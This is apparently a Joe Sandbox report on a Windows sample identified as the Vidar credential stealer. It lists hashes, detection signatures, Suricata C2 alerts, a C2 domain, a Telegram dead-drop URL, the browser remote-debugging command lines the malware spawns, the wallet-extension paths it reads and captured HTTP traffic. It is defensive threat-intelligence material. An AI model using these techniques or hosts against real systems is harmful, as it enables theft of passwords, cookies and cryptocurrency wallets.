Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1565212
MD5:	2d79aec368236c7741a6904e9adff58f
SHA1:	c0b6133df7148de54f876473ba1c64cb630108c1
SHA256:	b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35
Tags:	exeuser-jstrosch
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

AI detected suspicious sample

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Monitors registry run keys for changes

PE file has a writeable .text section

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Browser Started with Remote Debugging

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2D79AEC368236C7741A6904E9ADFF58F)

chrome.exe (PID: 7828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2220,i,4289607260128770584,8456024223546190286,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 4080 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4820 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2308,i,9625415575329100081,14063141058506753457,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5436 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3284 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 568 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8228 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6848 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8696 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=2024,i,2504633809733642858,1626570668665538026,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1500882253.0000000000857000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7516	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7516	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7516, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7828, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T12:27:30.842320+0100	2044247	1	Malware Command and Control Activity Detected	95.217.25.228	443	192.168.2.8	49710	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T12:27:33.310678+0100	2051831	1	Malware Command and Control Activity Detected	95.217.25.228	443	192.168.2.8	49711	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-29T12:27:30.842100+0100	2049087	1	A Network Trojan was detected	192.168.2.8	49710	95.217.25.228	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://kotov.lol/)	Avira URL Cloud: Label: malware
Source: https://kotov.lol/	Avira URL Cloud: Label: malware
Source: https://kotov.lol/Z	Avira URL Cloud: Label: malware
Source: https://kotov.lol/p	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 54%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00425435 CryptUnprotectData,

0_2_00425435

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49731 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.25.228:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.8:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.181.0:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49833 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004022FC FindFirstFileA,	0_2_004022FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00429305 FindFirstFileA,	0_2_00429305
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00425791 FindFirstFileA,FindFirstFileA,	0_2_00425791
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043A85B FindFirstFileA,memset,memset,	0_2_0043A85B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00423AC1 FindFirstFileA,	0_2_00423AC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426E63 FindFirstFileA,	0_2_00426E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004024A9 FindFirstFileA,	0_2_004024A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004288E9 FindFirstFileA,FindFirstFileA,	0_2_004288E9

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0043A05D GetLogicalDriveStringsA,

0_2_0043A05D

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 39MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:49710 -> 95.217.25.228:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.25.228:443 -> 192.168.2.8:49710
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.25.228:443 -> 192.168.2.8:49711

Source: global traffic

HTTP traffic detected: GET /gv4dlp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 23.96.180.189 23.96.180.189

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49731 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.84.141
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.181.0
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.158.35
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.158.35

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004151EC InternetReadFile,

0_2_004151EC

Source: global traffic	HTTP traffic detected: GET /gv4dlp HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kotov.lolConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ollo6842okoMZC9&MD=Sx6+nVES HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCIrTzQEIx9TNAQih1s0BCKjYzQEI+cDUFRjBy8wBGLrSzQEYxdjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIkMrNAQi5ys0BCIrTzQEIx9TNAQih1s0BCKjYzQEI+cDUFRjBy8wBGLrSzQEYxdjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1732879686233&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D52E8701DB86AF23F08FD361CDF6BCA&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=0D52E8701DB86AF23F08FD361CDF6BCA&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-5438092865908489856&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=67eacb04cb224a189347e7c63ff0bcc8 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0D52E8701DB86AF23F08FD361CDF6BCA; _EDGE_S=F=1&SID=32CC7631662568C00EBA637767AF6931; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
